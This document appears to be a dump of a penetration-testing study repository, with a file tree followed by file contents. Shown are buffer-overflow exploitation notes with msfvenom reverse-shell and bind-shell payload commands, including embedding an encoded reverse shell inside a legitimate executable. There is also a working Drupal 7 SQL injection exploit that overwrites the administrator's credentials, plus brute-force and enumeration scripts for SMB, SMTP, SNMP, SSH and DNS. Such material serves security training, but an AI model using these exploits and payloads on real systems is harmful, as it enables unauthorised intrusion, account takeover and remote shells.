├── Buffer_overflow
    └── info.txt
├── ENUMERATION
    ├── CMS
    │   ├── Drupal
    │   │   ├── 34984.py
    │   │   ├── CVE2014-3704.py
    │   │   ├── drupal-finduser.sh
    │   │   └── drupalbrute.py
    │   └── cms-explorer-1.0
    │   │   ├── LICENSE.txt
    │   │   ├── LW2.pm
    │   │   ├── README.txt
    │   │   ├── cms-explorer.pl
    │   │   ├── drupal_plugins.txt
    │   │   ├── drupal_themes.txt
    │   │   ├── joomla_plugins.txt
    │   │   ├── joomla_themes.txt
    │   │   ├── wp_plugins.txt
    │   │   └── wp_themes.txt
    ├── DNS
    │   ├── DNS-subdomain-bruteforce.sh
    │   └── DNS-zone-transfer-check.sh
    ├── FINGER
    │   └── finger_enum_user.sh
    ├── FTP
    │   └── ftp_commaands
    ├── NFS-RPC
    │   └── commands.txt
    ├── SMB
    │   ├── SMB-check-vulns.rb
    │   └── commands.txt
    ├── SMTP
    │   ├── SMTP-enum.rb
    │   ├── smtp-vrfy-from-file
    │   └── smtp_commands.txt
    ├── SNMP
    │   ├── commands.txt
    │   └── snmp-enumeration-snmpwalk-from-list.sh
    ├── SQL
    │   └── Microsoft_SQL.txt
    ├── SSH
    │   └── commands.txt
    ├── TELNET
    │   └── telnet_commands.txt
    ├── discover-master
    │   ├── .gitignore
    │   ├── LICENCE
    │   ├── README.md
    │   ├── alias
    │   ├── crack-wifi.sh
    │   ├── discover.sh
    │   ├── misc
    │   │   ├── compare-sites.sh
    │   │   ├── crawl.sh
    │   │   ├── dns-forward.sh
    │   │   ├── dns-reverse.sh
    │   │   ├── dns-transfer.sh
    │   │   ├── enum-linux.sh
    │   │   ├── enum-solaris.sh
    │   │   ├── netblocks.sh
    │   │   ├── netblocks.txt
    │   │   ├── nse.sh
    │   │   ├── ping-sweep.sh
    │   │   └── python
    │   │   │   ├── discover.py
    │   │   │   ├── ex1.py
    │   │   │   ├── ex2.py
    │   │   │   ├── multitabs.py
    │   │   │   ├── notes.txt
    │   │   │   ├── recon.py
    │   │   │   └── test.py
    │   ├── mods
    │   │   ├── goog-mail.py
    │   │   └── goohost.sh
    │   ├── notes
    │   │   ├── MSSQL Injection Cheat Sheet.pdf
    │   │   ├── bash.txt
    │   │   ├── buffer-overflows.txt
    │   │   ├── burp.txt
    │   │   ├── databases.txt
    │   │   ├── dns.txt
    │   │   ├── exploits.txt
    │   │   ├── git.txt
    │   │   ├── hack3rcon
    │   │   │   ├── main.sh
    │   │   │   ├── nmap.sh
    │   │   │   ├── open-list.sh
    │   │   │   ├── recon-domain.sh
    │   │   │   ├── recon-people.sh
    │   │   │   └── robots.sh
    │   │   ├── insecure-protocols.txt
    │   │   ├── kali.txt
    │   │   ├── linux.txt
    │   │   ├── maltego.txt
    │   │   ├── metasploit
    │   │   │   ├── Analysis of MSF Relative to PTES.pdf
    │   │   │   └── metasploit.txt
    │   │   ├── misc.txt
    │   │   ├── mobile.txt
    │   │   ├── nexpose.txt
    │   │   ├── oracle.txt
    │   │   ├── passwords.txt
    │   │   ├── pwk.txt
    │   │   ├── python.txt
    │   │   ├── smtp.txt
    │   │   ├── snmp.txt
    │   │   ├── sqli.txt
    │   │   ├── ssl.txt
    │   │   ├── unix.txt
    │   │   ├── web-apps.txt
    │   │   └── windows.txt
    │   ├── parsers
    │   │   ├── parse-burp.py
    │   │   ├── parse-nessus-feed.py
    │   │   ├── parse-nessus.py
    │   │   ├── parse-nexpose.py
    │   │   ├── parse-nippar.py
    │   │   ├── parse-nmap.py
    │   │   ├── parse-qualys.py
    │   │   └── utfdictcsv.py
    │   ├── report
    │   │   ├── css
    │   │   │   ├── defaults.css
    │   │   │   ├── ie.css
    │   │   │   └── style.css
    │   │   ├── data
    │   │   │   ├── active-recon.htm
    │   │   │   ├── doc.htm
    │   │   │   ├── emails.htm
    │   │   │   ├── hosts.htm
    │   │   │   ├── loadbalancing.htm
    │   │   │   ├── names.htm
    │   │   │   ├── passive-recon.htm
    │   │   │   ├── pdf.htm
    │   │   │   ├── ppt.htm
    │   │   │   ├── records.htm
    │   │   │   ├── squatting.htm
    │   │   │   ├── subdomains.htm
    │   │   │   ├── traceroute.htm
    │   │   │   ├── txt.htm
    │   │   │   ├── waf.htm
    │   │   │   ├── whatweb.htm
    │   │   │   ├── whois-domain.htm
    │   │   │   ├── whois-ip.htm
    │   │   │   ├── xls.htm
    │   │   │   └── zonetransfer.htm
    │   │   ├── images
    │   │   │   ├── icons
    │   │   │   │   ├── blue.png
    │   │   │   │   ├── green.png
    │   │   │   │   ├── red.png
    │   │   │   │   └── yellow.png
    │   │   │   └── logo.png
    │   │   ├── index.htm
    │   │   └── pages
    │   │   │   ├── active-recon.htm
    │   │   │   ├── black-listed.htm
    │   │   │   ├── config.htm
    │   │   │   ├── doc.htm
    │   │   │   ├── emails.htm
    │   │   │   ├── hosts.htm
    │   │   │   ├── loadbalancing.htm
    │   │   │   ├── names.htm
    │   │   │   ├── netcraft.htm
    │   │   │   ├── passive-recon.htm
    │   │   │   ├── pdf.htm
    │   │   │   ├── ppt.htm
    │   │   │   ├── records.htm
    │   │   │   ├── squatting.htm
    │   │   │   ├── subdomains.htm
    │   │   │   ├── traceroute.htm
    │   │   │   ├── txt.htm
    │   │   │   ├── waf.htm
    │   │   │   ├── whatweb.htm
    │   │   │   ├── whois-domain.htm
    │   │   │   ├── whois-ip.htm
    │   │   │   ├── xls.htm
    │   │   │   └── zonetransfer.htm
    │   ├── resource
    │   │   ├── adobe.rc
    │   │   ├── afp.rc
    │   │   ├── backdoor.rc
    │   │   ├── chargen.rc
    │   │   ├── citrix.rc
    │   │   ├── couchdb.rc
    │   │   ├── db2-2.rc
    │   │   ├── db2.rc
    │   │   ├── dcerpc.rc
    │   │   ├── dcerpc2.rc
    │   │   ├── emc.rc
    │   │   ├── emc2.rc
    │   │   ├── finger.rc
    │   │   ├── ftp.rc
    │   │   ├── h323.rc
    │   │   ├── http.rc
    │   │   ├── imap.rc
    │   │   ├── ipmi.rc
    │   │   ├── lotus.rc
    │   │   ├── misc.rc
    │   │   ├── misc
    │   │   │   ├── java.rc
    │   │   │   ├── listener.rc
    │   │   │   └── post.rc
    │   │   ├── motorola.rc
    │   │   ├── mssql.rc
    │   │   ├── mysql.rc
    │   │   ├── nessus.rc
    │   │   ├── netbios.rc
    │   │   ├── nfs.rc
    │   │   ├── ntp.rc
    │   │   ├── oracle.rc
    │   │   ├── oracle2.rc
    │   │   ├── oracle3.rc
    │   │   ├── oracle4.rc
    │   │   ├── pcanywhere.rc
    │   │   ├── pcanywhere2.rc
    │   │   ├── pop3.rc
    │   │   ├── postgres.rc
    │   │   ├── printers.rc
    │   │   ├── rdp.rc
    │   │   ├── recon-ng
    │   │   │   ├── active.rc
    │   │   │   ├── export.rc
    │   │   │   └── passive.rc
    │   │   ├── redis.rc
    │   │   ├── rmi.rc
    │   │   ├── rservices.rc
    │   │   ├── rservices2.rc
    │   │   ├── rservices3.rc
    │   │   ├── scada.rc
    │   │   ├── scada2.rc
    │   │   ├── scada3.rc
    │   │   ├── scada4.rc
    │   │   ├── scada5.rc
    │   │   ├── scada6.rc
    │   │   ├── sip.rc
    │   │   ├── sip2.rc
    │   │   ├── smb.rc
    │   │   ├── smtp.rc
    │   │   ├── smtp2.rc
    │   │   ├── snmp.rc
    │   │   ├── ssh.rc
    │   │   ├── telnet.rc
    │   │   ├── telnet2.rc
    │   │   ├── telnet3.rc
    │   │   ├── tftp.rc
    │   │   ├── tomcat.rc
    │   │   ├── upnp.rc
    │   │   ├── vmware.rc
    │   │   ├── vmware2.rc
    │   │   ├── vnc.rc
    │   │   ├── vxworks.rc
    │   │   ├── winrm.rc
    │   │   └── x11.rc
    │   ├── setup.sh
    │   └── update.sh
    ├── enumeration
    └── port scan & ping sweep
    │   ├── fping_sweep
    │   ├── nc-port-scanner.sh
    │   ├── nmap-ARP-ping.sh
    │   └── ping-sweep.sh
├── EXAM
    ├── documentation-strategy
    ├── pentest-reports
    │   └── curated-list-pentest-reports
    ├── tips
    └── useful-notes
├── KNOWN-vulnerabilities
├── PRIVESC
    ├── Linux
    │   ├── LinEnum.sh
    │   ├── PRIVESC_commands.txt
    │   ├── netcat-and-crontab.sh
    │   └── unix-privesc-check
    ├── Windows
    │   ├── Windows_commands
    │   ├── accesschk.exe
    │   ├── convert-python-exploits-to-exe
    │   ├── sysinternals
    │   │   ├── Eula.txt
    │   │   ├── PsExec.exe
    │   │   ├── PsGetsid.exe
    │   │   ├── PsInfo.exe
    │   │   ├── PsLoggedon.exe
    │   │   ├── PsService.exe
    │   │   ├── Pstools.chm
    │   │   ├── psfile.exe
    │   │   ├── pskill.exe
    │   │   ├── pslist.exe
    │   │   ├── psloglist.exe
    │   │   ├── pspasswd.exe
    │   │   ├── psping.exe
    │   │   ├── psshutdown.exe
    │   │   ├── pssuspend.exe
    │   │   └── psversion.txt
    │   └── useradd.c
    └── ncat_transfr files.txt
├── Post-exploitation
    └── windows.txt
├── Python_Servers
├── README.md
├── bruteforce & password_attacks
    ├── Crack Ms Office _ 2007
    │   ├── Makefile
    │   ├── RC4-40-brute.c
    │   ├── README.md
    │   ├── rc4.c
    │   ├── rc4.h
    │   └── zip.hashes
    ├── bruteforce_commands.txt
    ├── office2john.py
    │   ├── office2john.py
    │   └── read-me
    ├── pass-the-haash
    ├── steghide-bruteforce-tool
    └── zip-cracker.sh
├── gain access
    └── shells
    │   ├── php-reverse-shell-1.0
    │       └── php-reverse-shell.php
    │   └── spawn_shell_or break_out_of_jail.txt
├── persistence
    └── persistence_windows.txt
└── whatis
    ├── RPC-definition
    └── SMB(CIFS)-definition


/Buffer_overflow/info.txt:
--------------------------------------------------------------------------------
 1 |  Windows Buffer Overflows
 2 | 
 3 |     -   Controlling EIP
 4 |     
 5 |              locate pattern_create
 6 |              pattern_create.rb -l 2700
 7 |              locate pattern_offset
 8 |              pattern_offset.rb -q 39694438
 9 | 
10 |     -   Verify exact location of EIP - [\*] Exact match at offset 2606
11 | 
12 |             buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90
13 | 
14 |     -   Check for “Bad Characters” - Run multiple times 0x00 - 0xFF
15 | 
16 |     -   Use Mona to determine a module that is unprotected
17 | 
18 |     -   Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP
19 | 
20 |     -   Use NASM to determine the HEX code for a JMP ESP instruction
21 | 
22 |             /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
23 | 
24 |             JMP ESP  
25 |             00000000 FFE4 jmp esp
26 | 
27 |     -   Run Mona in immunity log window to find (FFE4) XEF command
28 | 
29 |             !mona find -s "\xff\xe4" -m slmfc.dll  
30 |             found at 0x5f4a358f - Flip around for little endian format
31 |             buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
32 | 
33 |     -   MSFVenom to create payload
34 |     
35 |             msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d"
36 | 
37 |     -   Final Payload with NOP slide  
38 |     
39 |             buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
40 | 
41 |     -   Create a PE Reverse Shell  
42 |         msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
43 |         -f  
44 |         exe -o shell\_reverse.exe
45 | 
46 |     -   Create a PE Reverse Shell and Encode 9 times with
47 |         Shikata\_ga\_nai  
48 |         msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444
49 |         -f  
50 |         exe -e x86/shikata\_ga\_nai -i 9 -o
51 |         shell\_reverse\_msf\_encoded.exe
52 | 
53 |     -   Create a PE reverse shell and embed it into an existing
54 |         executable  
55 |         msfvenom -p windows/shell\_reverse\_tcp LHOST=$ip LPORT=4444 -f
56 |         exe -e x86/shikata\_ga\_nai -i 9 -x
57 |         /usr/share/windows-binaries/plink.exe -o
58 |         shell\_reverse\_msf\_encoded\_embedded.exe
59 | 
60 |     -   Create a PE Reverse HTTPS shell  
61 |         msfvenom -p windows/meterpreter/reverse\_https LHOST=$ip
62 |         LPORT=443 -f exe -o met\_https\_reverse.exe
63 | 
64 | -   Linux Buffer Overflows
65 | 
66 |     -   Run Evans Debugger against an app  
67 |         edb --run /usr/games/crossfire/bin/crossfire
68 | 
69 |     -   ESP register points toward the end of our CBuffer  
70 |         add eax,12  
71 |         jmp eax  
72 |         83C00C add eax,byte +0xc  
73 |         FFE0 jmp eax
74 | 
75 |     -   Check for “Bad Characters” Process of elimination - Run multiple
76 |         times 0x00 - 0xFF
77 | 
78 |     -   Find JMP ESP address  
79 |         "\\x97\\x45\\x13\\x08" \# Found at Address 08134597
80 | 
81 |     -   crash = "\\x41" \* 4368 + "\\x97\\x45\\x13\\x08" +
82 |         "\\x83\\xc0\\x0c\\xff\\xe0\\x90\\x90"
83 | 
84 |     -   msfvenom -p linux/x86/shell\_bind\_tcp LPORT=4444 -f c -b
85 |         "\\x00\\x0a\\x0d\\x20" –e x86/shikata\_ga\_nai
86 | 
87 |     -   Connect to the shell with netcat:  
88 |         nc -v $ip 4444
89 | 


--------------------------------------------------------------------------------
/ENUMERATION/CMS/Drupal/34984.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | #Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
 3 | #Creditz to https://www.reddit.com/user/fyukyuk
 4 | 
 5 | import urllib2,sys
 6 | import drupalpass
 7 | from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
 8 | host = sys.argv[1]
 9 | user = sys.argv[2]
10 | password = sys.argv[3]
11 | if len(sys.argv) != 3:
12 |     print "host username password"
13 |     print "http://nope.io admin wowsecure"
14 | hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
15 | target = '%s/?q=node&destination=node' % host
16 | post_data = "name[0%20;update+users+set+name%3d\'" \
17 |             +user \
18 |             +"'+,+pass+%3d+'" \
19 |             +hash[:55] \
20 |             +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
21 | content = urllib2.urlopen(url=target, data=post_data).read()
22 | if "mb_strlen() expects parameter 1" in content:
23 |         print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
24 | 


--------------------------------------------------------------------------------
/ENUMERATION/CMS/Drupal/drupal-finduser.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #find an existing user in Drupal 7
3 | 
4 | cat /usr/share/wordlists/rockyou.txt | while read line
5 | do
6 | 	curl http://192.168.230.147/?q=$line
7 | done
8 | 


--------------------------------------------------------------------------------
/ENUMERATION/CMS/cms-explorer-1.0/joomla_themes.txt:
--------------------------------------------------------------------------------
 1 | templates/abc/
 2 | templates/atomic/
 3 | templates/b59-tpl8/
 4 | templates/beez/
 5 | templates/carbon_07/
 6 | templates/crub/
 7 | templates/dm_arrow_red/
 8 | templates/gk_eshoptrix_2/
 9 | templates/gk_gomuproject/
10 | templates/gk_icki_sports/
11 | templates/gk_musictop/
12 | templates/ja_purity/
13 | templates/ja_rochea/
14 | templates/ja_teline_ii/
15 | templates/joomlaport_metro/
16 | templates/js_relevant/
17 | templates/mynxx_j15/
18 | templates/planets/
19 | templates/planetsv2/
20 | templates/rhuk_milkyway/
21 | templates/rt_hivemind_j15/
22 | templates/rt_mediamogul_essentials_j15/
23 | templates/rt_nexus_j15/
24 | templates/siteground-j15-14/
25 | templates/siteground-j15-68/
26 | templates/siteground-j15-86/
27 | templates/siteground99/
28 | templates/system/
29 | templates/yoo_phoenix/
30 | templates/yoo_waybeyond/


--------------------------------------------------------------------------------
/ENUMERATION/DNS/DNS-subdomain-bruteforce.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # bruteforce subdomains
3 | # using /usr/share/wordlists/dnscan subdomains wordlists
4 | # usage: edit mydomain.com
5 | 
6 | 
7 | for domain in $(cat /usr/share/wordlists/dnscan/subdomains-100.txt);
8 | do host $domain.mydomain.com;sleep 2;done | grep has | sort -u
9 | 


--------------------------------------------------------------------------------
/ENUMERATION/DNS/DNS-zone-transfer-check.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | #Simple Zone Transfer Bash Script
 3 | # $1 is the first argument given after the bash script
 4 | # Check if argument was given, if not, print usage
 5 | # usage: ./file.sh domain.com
 6 | 
 7 | if [ -z "$1" ]; then
 8 | 	echo "[*] Simple Zone transfer script"
 9 | 	echo "[*] Usage:	: $0 <domain name> "
10 | 	exit 0
11 | fi
12 | 
13 | #if argument was given, identify the DNS servers for the domain.
14 | #For each of thse servers, attempt a zone transfer
15 | 
16 | for server in $(host -t ns $1 | cut -d" " -f4);do
17 | 	host -l $1 $server | grep "has address"
18 | done
19 | 


--------------------------------------------------------------------------------
/ENUMERATION/FINGER/finger_enum_user.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | # http://stackoverflow.com/questions/10929453/read-a-file-line-by-line-assigning-the-value-to-a-variable
 4 | display_usage()
 5 | {
 6 | 	echo -e "\nScript takes a file with a list of users as argument"
 7 | 	echo -e "Usage:\n./finger_enum_user.sh <filename.txt>\n"
 8 | }
 9 | 
10 | if [ $# -le 0 ]
11 | then
12 | 	display_usage
13 | 	exit 1
14 | fi
15 | 
16 | while IFS='' read -r line || [[ -n "$line" ]]; do
17 | 
18 | 	echo "User :" $line
19 | 	finger $line@192.168.1.33
20 | 	echo -e "\n"
21 | 
22 | done < "$1"
23 | 


--------------------------------------------------------------------------------
/ENUMERATION/FTP/ftp_commaands:
--------------------------------------------------------------------------------
1 | 
2 | nmap --script=*ftp* --script-args=unsafe=1 -p 20,21 10.11.1.8
3 | 


--------------------------------------------------------------------------------
/ENUMERATION/NFS-RPC/commands.txt:
--------------------------------------------------------------------------------
 1 | nmap -sV --script=nfs-* 192.168.44.133
 2 | nmap -sV --script=nfs-ls 192.168.44.133  //same result as rpcinfo
 3 | nmap -sV --script=nfs-* 192.168.44.133 // all nfs scripts
 4 | 
 5 | rpcinfo -p 192.x.x.x
 6 | rpcclient -I 192.x.x.x
 7 | 
 8 | #mount NTFS share
 9 | mount -t nfs 192.168.1.72:/home/vulnix /tmp/mnt -nolock
10 | 
11 | #enumerate NFS shares
12 | showmount -e 192.168.56.103
13 | 
14 | # If you see any NFS related ACL port open, see /etc/exports
15 | #   2049/tcp  nfs_acl
16 | # /etc/exports: the access control list for filesystems which may be exported to NFS clients.  See exports(5).
17 | 
18 | READ:
19 | https://pentestlab.blog/tag/rpc/
20 | 
21 | See root squashing
22 | https://haiderm.com/linux-privilege-escalation-using-weak-nfs-permissions/
23 | 
24 | 


--------------------------------------------------------------------------------
/ENUMERATION/SMB/SMB-check-vulns.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | # = smb-check-vulns has been removed, this will iterate over all nse smb scripts to perhaps save some time - can extend this to any nse script later
 3 | # = add nse scripts to scripts hash below 
 4 | 
 5 | require 'optparse'
 6 | 
 7 | options = {:ports => nil,:ip => nil}
 8 | summary = ""
 9 | 
10 | ARGV.push("-h") if ARGV.empty?
11 | parse = OptionParser.new do |opts|
12 |   opts.banner = "Usage: smb-check-vulns.rb [options]"
13 |   opts.on("-p","--ports x,y","-[a-z]","Enter port or ports to scan comma seperated") do |port|
14 |     options[:ports] = port
15 |   end
16 |   opts.on("-i","--ip x,y","ip address") do |ip|
17 |     options[:ip] = ip
18 |   end 
19 |   opts.on("-h", "--help","Displays help")do
20 |     puts opts
21 |     exit
22 |   end
23 |   summary = opts.summarize
24 | end.parse!
25 | 
26 | @scripts=["smb-vuln-conficker.nse","smb-vuln-cve2009-3103.nse","smb-vuln-ms06-025.nse","smb-vuln-ms07-029.nse","smb-vuln-ms08-067.nse","smb-vuln-ms10-054.nse","smb-vuln-ms10-061.nse","smb-vuln-regsvc-dos.nse"]
27 | @ports = options[:ports]
28 | @ip    = options[:ip]
29 | @output= []
30 | def check_vulns
31 |   @scripts.each{|vuln|puts "[+] checking #{vuln}"; @output << %x[nmap -v #{@ip} -p #{@ports} --script=#{vuln}]}
32 | end
33 | 
34 | def format_output
35 |   @output.each{|result| puts "\n" + result.partition("VULNERABLE:").first.partition("report for ").last + result.partition("VULNERABLE:").last.partition("NSE: Script Post").first if result.include?("VULNERABLE")}
36 | end
37 | 
38 | check_vulns
39 | format_output
40 | 


--------------------------------------------------------------------------------
/ENUMERATION/SMB/commands.txt:
--------------------------------------------------------------------------------
 1 |     == SMB NETBIOS== 
 2 | enum4linux x.x.x.x
 3 | nmap -v -p 139,445 -oG smb.txt 192.168.11.200-254
 4 | nbtscan -r 192.168.11.0/24
 5 | nmblookup -A target
 6 | 
 7 | ## SMB version
 8 | msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
 9 | msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
10 | RHOSTS => 192.168.31.142
11 | msf auxiliary(scanner/smb/smb_version) > run
12 | [*] 192.168.31.142:139    - Host could not be identified: Unix (Samba 2.2.1a)
13 | 
14 | ## SMB brute force
15 | use auxiliary/scanner/smb/smb_login
16 | 
17 | ## Existing users
18 | msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid
19 | msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142
20 | RHOSTS => 192.168.31.142
21 | msf auxiliary(scanner/smb/smb_lookupsid) > run
22 | [*] 192.168.31.142:139    - PIPE(LSARPC) LOCAL(MYGROUP - 5-21-4157223341-3243572438-1405127623) DOMAIN(MYGROUP - )
23 | [*] 192.168.31.142:139    - TYPE=0 NAME=Administrator rid=500
24 | 
25 |     == NetBIOS NullSession enumeration ==
26 | # This  feature  exists  to  allow  unauthenticated  machines  to  obtain  browse  lists  from  other  
27 | # Microsoft   servers. Enum4linux is a wrapper  built on top of smbclient,rpcclient, net and nmblookup
28 | enum4linux -a 192.168.1.1
29 | 
30 | ## upload file
31 | smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py"
32 | 
33 |   == NMAP SMB scripts ==
34 | nmap --script smb-* --script-args=unsafe=1 192.168.10.55 
35 | 
36 | #  ls -lh /usr/share/nmap/scripts/smb*	
37 | smb-brute.nse
38 | smb-enum-domains.nse
39 | smb-enum-groups.nse
40 | smb-enum-processes.nse
41 | smb-enum-sessions.nse
42 | smb-enum-shares.nse
43 | smb-enum-users.nse
44 | smb-flood.nse
45 | smb-ls.nse
46 | smb-mbenum.nse
47 | smb-os-discovery.nse
48 | smb-print-text.nse
49 | smb-psexec.nse
50 | smb-security-mode.nse
51 | smb-server-stats.nse
52 | smb-system-info.nse
53 | smb-vuln-conficker.nse
54 | smb-vuln-cve2009-3103.nse
55 | smb-vuln-ms06-025.nse
56 | smb-vuln-ms07-029.nse
57 | smb-vuln-ms08-067.nse
58 | smb-vuln-ms10-054.nse
59 | smb-vuln-ms10-061.nse
60 | smb-vuln-regsvc-dos.nse
61 | smbv2-enabled.nse
62 | 
63 | rpcclient -U "" target // connect as blank user /nobody
64 | smbmap -u "" -p "" -d MYGROUP -H 10.11.1.22
65 | 
66 |   #mount SMB shares in Linux
67 | smbclient -L \\WIN7\ -I 192.168.13.218
68 | smbclient -L \\WIN7\ADMIN$  -I 192.168.13.218
69 | smbclient -L \\WIN7\C$ -I 192.168.13.218
70 | smbclient -L \\WIN7\IPC$ -I 192.168.13.218
71 | smbclient \\192.168.13.236\some-share -o user=root,pass=root,workgroup=BOB
72 | apt-get install cifs-utils
73 | mount -t cifs //10.11.6.31/wwwroot -o username=xxx,password=xxx /tmp/smb/
74 | 
75 | 
76 | # mount SMB share to a folder
77 | mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP
78 | 
79 | # mount SMB shares in Windows (via cmd)
80 | C:\WINDOWS\system32> dir \\Computer_name\wwwroot                              
81 | net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES
82 | 


--------------------------------------------------------------------------------
/ENUMERATION/SMTP/smtp-vrfy-from-file:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import socket
 4 | import sys
 5 | 
 6 | # Probably u don't need it now
 7 | #if len(sys.argv) != 2:
 8 |     #print "usage: vrfy.py <username>"
 9 |     #sys.exit(0)
10 | 
11 | with open('/usr/share/wordlists/metasploit/unix_users.txt', 'r') as f:
12 |     users = f.readlines()
13 | 
14 | #create socket
15 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
16 | #connect to the server 
17 | connect=s.connect(('192.168.44.133',25))
18 | #Receive the banner
19 | banner=s.recv(1024)
20 | print banner
21 | 
22 | for u in users:
23 |     user = u.strip()
24 | 
25 |     #VRFY a user
26 |     s.send('VRFY ' + user + '\r\n')
27 |     result=s.recv(1024)
28 |     print result
29 | 
30 | #close the socket
31 | s.close
32 | 


--------------------------------------------------------------------------------
/ENUMERATION/SMTP/smtp_commands.txt:
--------------------------------------------------------------------------------
 1 | smtp-user-enum  //in Kali
 2 | smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.22
 3 | 
 4 | SMTP sendmail commands:
 5 | 
 6 | bash-2.05a$ telnet localhost 25
 7 | Trying 127.0.0.1...
 8 | Connected to localhost.
 9 | Escape character is '^]'.
10 | 220 barry ESMTP Sendmail 8.11.6/8.11.6; Sun, 20 Aug 2017 00:01:02 +0300
11 | help
12 | 214-2.0.0 This is sendmail version 8.11.6
13 | 214-2.0.0 Topics:
14 | 214-2.0.0 	HELO	EHLO	MAIL	RCPT	DATA
15 | 214-2.0.0 	RSET	NOOP	QUIT	HELP	VRFY
16 | 214-2.0.0 	EXPN	VERB	ETRN	DSN	AUTH
17 | 214-2.0.0 	STARTTLS
18 | 214-2.0.0 For more info use "HELP <topic>".
19 | 214-2.0.0 To report bugs in the implementation send email to
20 | 214-2.0.0 	sendmail-bugs@sendmail.org.
21 | 214-2.0.0 For local information send email to Postmaster at your site.
22 | 214 2.0.0 End of HELP info
23 | AUTH
24 | 503 5.3.3 AUTH mechanism  not available
25 | EHLO barry
26 | 250-barry Hello localhost [127.0.0.1], pleased to meet you
27 | 250-ENHANCEDSTATUSCODES
28 | 250-EXPN
29 | 250-VERB
30 | 250-8BITMIME
31 | 250-SIZE
32 | 250-DSN
33 | 250-ONEX
34 | 250-ETRN
35 | 250-XUSR
36 | 250 HELP
37 | AUTH LOGIN
38 | 
39 | 


--------------------------------------------------------------------------------
/ENUMERATION/SNMP/commands.txt:
--------------------------------------------------------------------------------
 1 |   == SNMP ==
 2 | nmap -sU -p 161 --script=*snmp* 192.168.1.200
 3 | xprobe2 -v -p udp:161:open 192.168.1.200
 4 | 
 5 | msf >  use auxiliary/scanner/snmp/snmp_login
 6 | msf > use auxiliary/scanner/snmp/snmp_enum
 7 | 
 8 | snmp-check 192.168.1.2 -c public
 9 | snmpget -v 1 -c public IP
10 | snmpwalk -v 1 -c public IP
11 | snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
12 | onesixtyone -c /usr/share/wordlists/dirb/small.txt 192.168.1.200  // find communities with bruteforce
13 | 
14 | for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt);do snmpwalk -v 1 -c $i 192.168.1.200;done| grep -e "Timeout" // find communities with bruteforce
15 | 


--------------------------------------------------------------------------------
/ENUMERATION/SNMP/snmp-enumeration-snmpwalk-from-list.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #for mib in $(cat /root/exercises/mibs.txt);do snmpwalk -c public -v1 $ip $mib;done
3 | #while read i ; do snmpwalk -c public -v1 $ip $i ; done < /root/exercises/mibs.txt
4 | 
5 | for ip in $(cat /root/exercises/snmphosts2.txt);do snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25;done
6 | 


--------------------------------------------------------------------------------
/ENUMERATION/SQL/Microsoft_SQL.txt:
--------------------------------------------------------------------------------
1 |         'nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes  --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip'
2 | 


--------------------------------------------------------------------------------
/ENUMERATION/SSH/commands.txt:
--------------------------------------------------------------------------------
 1 | 
 2 |   == SSH user enumeration ==
 3 |   
 4 | 1)
 5 | python ./40136.py 192.168.31.149 -U /usr/share/wordlists/metasploit/unix_users.txt -e --trials 5 --bytes 10
 6 | 
 7 | 
 8 | 
 9 | 2) 
10 | msf > use auxiliary/scanner/ssh/ssh_enumusers
11 | msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.31.149
12 | RHOSTS => 192.168.31.149
13 | msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
14 | USER_FILE => /usr/share/wordlists/metasploit/unix_users.txt
15 | msf auxiliary(scanner/ssh/ssh_enumusers) > run
16 | 
17 | [*] 192.168.31.149:22 - SSH - Checking for false positives
18 | [*] 192.168.31.149:22 - SSH - Starting scan
19 | [-] 192.168.31.149:22 - SSH - User '4Dgifts' not found
20 | [-] 192.168.31.149:22 - SSH - User 'EZsetup' not found
21 | [-] 192.168.31.149:22 - SSH - User 'OutOfBox' not found
22 | 


--------------------------------------------------------------------------------
/ENUMERATION/TELNET/telnet_commands.txt:
--------------------------------------------------------------------------------
 1 | 
